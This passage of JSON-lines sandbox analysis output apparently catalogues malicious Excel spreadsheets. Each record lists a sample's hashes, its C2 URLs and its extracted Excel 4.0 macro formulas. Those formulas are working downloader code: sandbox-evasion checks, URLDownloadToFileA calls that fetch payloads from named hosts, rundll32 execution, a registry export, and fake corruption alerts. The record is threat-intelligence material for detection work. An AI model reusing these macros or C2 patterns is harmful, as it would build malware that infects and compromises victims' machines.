CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3fnMMGxHuv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49b999dac85c995c7eaef4fd1047cd7e2484763e02d225ed97a751ee6bc4c784"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49b999dac85c995c7eaef4fd1047cd7e2484763e02d225ed97a751ee6bc4c784","filesize":167936,"md5":"2eea43476f1a4e45a9ed9f9ca5a26153","sha1":"a8dec44611c47fd2f1a22ca2a7a17dae0ab86c64","sha256":"49b999dac85c995c7eaef4fd1047cd7e2484763e02d225ed97a751ee6bc4c784","sha512":"6cf89a01c375f644099256ec5474d498a164a381d27756064bf480b2fab2800d84ee9b7962d7411996378ae8246bfaa25ad928e8ee5b11eced12b6e24e8c37b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49b999dac85c995c7eaef4fd1047cd7e2484763e02d225ed97a751ee6bc4c784.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R4f5LnyKin\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49d59daa590b0ed32286f037289b943fe6f5f5834fe2ab2b7a954dba99ce958c"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49d59daa590b0ed32286f037289b943fe6f5f5834fe2ab2b7a954dba99ce958c","filesize":147968,"md5":"142af01974b6e460ddcf508c344ebb24","sha1":"6ebaad63ce550e63c63b7fb7493a36130d9e8284","sha256":"49d59daa590b0ed32286f037289b943fe6f5f5834fe2ab2b7a954dba99ce958c","sha512":"3aadd1fb81272f10d69ae4ac8047d7f0514299a8852c37c42354bcf84e34f748e938feaf6cf761b4880baf2e29285afce06af1332e1612b4d4b6d06121824330","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49d59daa590b0ed32286f037289b943fe6f5f5834fe2ab2b7a954dba99ce958c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"TQvn2TdCgV\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49e556014825f719eeb2d8668a1400f1cb6233091a071a23b56ed4b0130685f0"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49e556014825f719eeb2d8668a1400f1cb6233091a071a23b56ed4b0130685f0","filesize":185344,"md5":"e4afbb5afd683902a9eb98a60990216c","sha1":"e5f5eb505d6d3831cf4c2a1e2723096612b54c14","sha256":"49e556014825f719eeb2d8668a1400f1cb6233091a071a23b56ed4b0130685f0","sha512":"3b2533b1b83b4db7d1a5c9dc86112fc60995985afea10a5a34399fbf2a568909e46cfb32807f8baf707110bbcedaa22f23c78042df93fe9783b844df5a129c53","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49e556014825f719eeb2d8668a1400f1cb6233091a071a23b56ed4b0130685f0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a1212dafe91066853aa2699f2144c667929e47ce842a7ce3ab58dcf074ae417"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4a1212dafe91066853aa2699f2144c667929e47ce842a7ce3ab58dcf074ae417","filesize":147968,"md5":"b6619c2153cad4fcb2e9d0a6cddd0deb","sha1":"38c9351f4eda552ac268b6b84daffe0ac318fbdc","sha256":"4a1212dafe91066853aa2699f2144c667929e47ce842a7ce3ab58dcf074ae417","sha512":"ea048becf4d60f83a3273c1372cdaaf8046073406610326e43c571c8d7eb565dcfcb5db7626273e886f2c53e43141e8c8cd85e815684dbaf4f089d25f4f81ea3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a1212dafe91066853aa2699f2144c667929e47ce842a7ce3ab58dcf074ae417.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"eAfqXgUw9v\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a176026c261615e95f40da7a6edc51e5ae7c1ea2e99350f8d8807ff11e9b8a4"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4a176026c261615e95f40da7a6edc51e5ae7c1ea2e99350f8d8807ff11e9b8a4","filesize":209920,"md5":"1be6075d2bed3d851f2fc168f242438b","sha1":"ac87caf3718f32aaa364ce0f6f6737519cd6ae7b","sha256":"4a176026c261615e95f40da7a6edc51e5ae7c1ea2e99350f8d8807ff11e9b8a4","sha512":"78f4bc511ed3e4c999fa3f035e547ad5414fa64f8c6d56105f871c97a30545aee4a7415cabe712c6fb0015b93ce9cd036c59f005195ccf0b90af29f0135c5223","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a176026c261615e95f40da7a6edc51e5ae7c1ea2e99350f8d8807ff11e9b8a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cHOVdWSJIU\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a1dd55c34cf986bc958242adaa38b56dfbfdaba64ed898ea8d5848ad6df7a03"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a1dd55c34cf986bc958242adaa38b56dfbfdaba64ed898ea8d5848ad6df7a03","filesize":206336,"md5":"a91bf7a8983473cc5637401b5487ab9d","sha1":"81854b4797ad24cf6a5b5c65832dc60b20b1a84d","sha256":"4a1dd55c34cf986bc958242adaa38b56dfbfdaba64ed898ea8d5848ad6df7a03","sha512":"5045ef169378550a9dcd6e0e9286118e8cd3ced80cf7bb13f593e7d604d1b0f59ce227cbdeb653dc881d0ea2b4b7cf558af4b5d2f9068d624a0c4a33e1832c9d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a1dd55c34cf986bc958242adaa38b56dfbfdaba64ed898ea8d5848ad6df7a03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wrKNgcyJ0K\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a21ab45d2122420dec82ac868f670eaa02f1d5d779d3cdc41c4ac07ca5b7a28"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a21ab45d2122420dec82ac868f670eaa02f1d5d779d3cdc41c4ac07ca5b7a28","filesize":147968,"md5":"79327d12983ce28653708d5b0e5930e6","sha1":"ecab1ee45e51055c3ea8f1b58b6100c86205fbee","sha256":"4a21ab45d2122420dec82ac868f670eaa02f1d5d779d3cdc41c4ac07ca5b7a28","sha512":"0894ccd34c104f0e2ead808d0d0363b0422098974b9e516bd8daa6e2e968a6d1f9feb4fb9470f3de546408851c623be8a62aaa56cfbc72e7d404e2ed120d60c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a21ab45d2122420dec82ac868f670eaa02f1d5d779d3cdc41c4ac07ca5b7a28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"51BLcvePkG\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a2bc41184cffbe4698cb1b3bc51ef435a9b06d7a78afd409efe8abab47adf88"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a2bc41184cffbe4698cb1b3bc51ef435a9b06d7a78afd409efe8abab47adf88","filesize":185344,"md5":"7a149e74da8f93a0c454754396b62892","sha1":"8a287448bfaaa0dfcb9794e59461526ea875bbf1","sha256":"4a2bc41184cffbe4698cb1b3bc51ef435a9b06d7a78afd409efe8abab47adf88","sha512":"b2e8d9488c19dfaf4ab8509cb3e81657c3035e453f3adf19b17baefd7fae68b388296466b61745e4951e8d54cf4da24f0adbb5dcd57a4f4bea1c84c192e17bff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a2bc41184cffbe4698cb1b3bc51ef435a9b06d7a78afd409efe8abab47adf88.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a372c50c6f621f52307a9c39411742826506ea507127e720b44d724e29eb291"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a372c50c6f621f52307a9c39411742826506ea507127e720b44d724e29eb291","filesize":112640,"md5":"e3e4877b3edc3195eba5397fb5c13ede","sha1":"e57c057e2fe8996d6c2a4b233fc59c84bf1e0db8","sha256":"4a372c50c6f621f52307a9c39411742826506ea507127e720b44d724e29eb291","sha512":"c8f6d5b907630ee06cdaa2f7c33cb28f4487bf0619c34cb9be40e466fb0fe51da47bfb6c87dd46eb4bfb181b4acd027d4a31bc31ed5c76f79d5ca1d32ce49d3f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a372c50c6f621f52307a9c39411742826506ea507127e720b44d724e29eb291.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a4a407392be382584d636852e20142468476d125c87ea20cc5554879a1cf3d8"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a4a407392be382584d636852e20142468476d125c87ea20cc5554879a1cf3d8","filesize":170496,"md5":"3ef3b03df4e3fcb8fa31f57c311f609d","sha1":"f003ecd9d1923e8d51e78395d39842b45def5990","sha256":"4a4a407392be382584d636852e20142468476d125c87ea20cc5554879a1cf3d8","sha512":"77b029018960c1d11762dc5ab3f3b4649cadca2dc63472c09aa8183dc0e53cc7cc8573b68337e7813464b2a5fdb8fc4174986dc34b15cf7b8eda58b68924bfa6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a4a407392be382584d636852e20142468476d125c87ea20cc5554879a1cf3d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4UHbaZod1A\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a52109f2c26c397f913b13be90a835dd8ae0055c58aff8622d349c23df94fbc"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a52109f2c26c397f913b13be90a835dd8ae0055c58aff8622d349c23df94fbc","filesize":109568,"md5":"ff450ecd1cd89f8550b4cb233bac4750","sha1":"44690da3336d8ce14fccefb591134abbe804d2af","sha256":"4a52109f2c26c397f913b13be90a835dd8ae0055c58aff8622d349c23df94fbc","sha512":"ab9cf1c6befc93ce499ce28f122f0d18551696cbc4b6f57515f08e02687ce868de01b69419f0d23639d0e5977017795b034652ea4d475fe5ea1983ec2addddcb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a52109f2c26c397f913b13be90a835dd8ae0055c58aff8622d349c23df94fbc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"3yoD1sgMfm\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a5d8cde14f9e8c4f1a0cf514ca084528631d6caa8aa5282a4bf8f58dbf54f33"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a5d8cde14f9e8c4f1a0cf514ca084528631d6caa8aa5282a4bf8f58dbf54f33","filesize":167936,"md5":"4bdf5e1721fe039da0e13ef386b8a6dc","sha1":"6b891a0f9b316032cbb7a8fc392542e4b5402447","sha256":"4a5d8cde14f9e8c4f1a0cf514ca084528631d6caa8aa5282a4bf8f58dbf54f33","sha512":"7a0e1228eb88f374cea1b5f38b29dd85cf7341c22020597ee4cac288f92c6fc4a5f825d49bf09a7e0c205f4a1906f1e3276f3c5e61b7fbeb23d61c469ace305c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a5d8cde14f9e8c4f1a0cf514ca084528631d6caa8aa5282a4bf8f58dbf54f33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vSuhZ3x7ZO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a6ae5dbbad3f8e2b616ce629e965ed70abaedcc49e9296611294d62d2021af1"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a6ae5dbbad3f8e2b616ce629e965ed70abaedcc49e9296611294d62d2021af1","filesize":185344,"md5":"ce3f3f304cd4695a78f3bb71484d27f0","sha1":"ec78f7b21325effb2d30ca3a62f33541cb766f6b","sha256":"4a6ae5dbbad3f8e2b616ce629e965ed70abaedcc49e9296611294d62d2021af1","sha512":"45c8f3e30374610ea71a5594356ef360d7603759f11270d5c5ea35d436cffd7ebaf85a68a20f397a405c4530e650d6d49459195e1a5ac009e973ee654751768b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a6ae5dbbad3f8e2b616ce629e965ed70abaedcc49e9296611294d62d2021af1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a83db7a8a7966a0c3b33704ff2e88660f75e0606c88f4aee49902efc75cb2d3"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a83db7a8a7966a0c3b33704ff2e88660f75e0606c88f4aee49902efc75cb2d3","filesize":185344,"md5":"eb5c27ce058cd180989076f351a9b91d","sha1":"6941f901f80995604fb45ba1494979cad3675c0e","sha256":"4a83db7a8a7966a0c3b33704ff2e88660f75e0606c88f4aee49902efc75cb2d3","sha512":"415ebaf07f88163d273406ecc3e29c22099963697d2a861892a5193d8d44fcb8a3f5bc66d0a7155ad927ae89a026a5d510744a77531109282609f1727b59e6b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a83db7a8a7966a0c3b33704ff2e88660f75e0606c88f4aee49902efc75cb2d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a8920d82eb78a449af53c46bd4bde4eb487c1a78ffd8e502aaab441e430a5c5"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a8920d82eb78a449af53c46bd4bde4eb487c1a78ffd8e502aaab441e430a5c5","filesize":116224,"md5":"22e5744b35b6fa888eb9e661e4f8ec4b","sha1":"080828c66c1622f42305b3d393a6c8dbce5f2059","sha256":"4a8920d82eb78a449af53c46bd4bde4eb487c1a78ffd8e502aaab441e430a5c5","sha512":"238a87933a22a128faec1bea1fbf8d3017252b6041cff45751d81f06c6ddef1dd0dbf75cca7145744916225f6ab06852550b662fd7a1334e61566ec91b9d0590","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a8920d82eb78a449af53c46bd4bde4eb487c1a78ffd8e502aaab441e430a5c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NvgdWypJ9E\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4a92d185ff5c2e7db321b44253365f693e40602bd269295677e87968d921bd21"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4a92d185ff5c2e7db321b44253365f693e40602bd269295677e87968d921bd21","filesize":168448,"md5":"d3ca34561284912d1fa904dfd5e21377","sha1":"38f1e2f16ff6886063bd7a8cdc82bb7f748ef357","sha256":"4a92d185ff5c2e7db321b44253365f693e40602bd269295677e87968d921bd21","sha512":"ab1fb18a4f6f3645a587f97b8b4a3fc012c7f2fdacd63415209cfb14600eef43f82335c13b167d67e7098e17f761caa24d4685567c75b54995fe1415152b38f8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4a92d185ff5c2e7db321b44253365f693e40602bd269295677e87968d921bd21.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wmVSmZO2XA\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4aab3c8f0fb733ee8ea1f193145240399e5d653b23bb00c53acdf801e8debb90"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4aab3c8f0fb733ee8ea1f193145240399e5d653b23bb00c53acdf801e8debb90","filesize":209920,"md5":"d324029bdae39262891d1bc9ed5a92b0","sha1":"11b6b4be09c06b2c8e138303c295ab321e57c525","sha256":"4aab3c8f0fb733ee8ea1f193145240399e5d653b23bb00c53acdf801e8debb90","sha512":"ef65f44137bd0083ecdbe549f74d7597b6016a55f2574a0f1afe957d92be308c86a9d5a8bfd7b0f545efc12b9ac8ee48e6f777ce5a03d318e26f4d89e378f898","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4aab3c8f0fb733ee8ea1f193145240399e5d653b23bb00c53acdf801e8debb90.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security 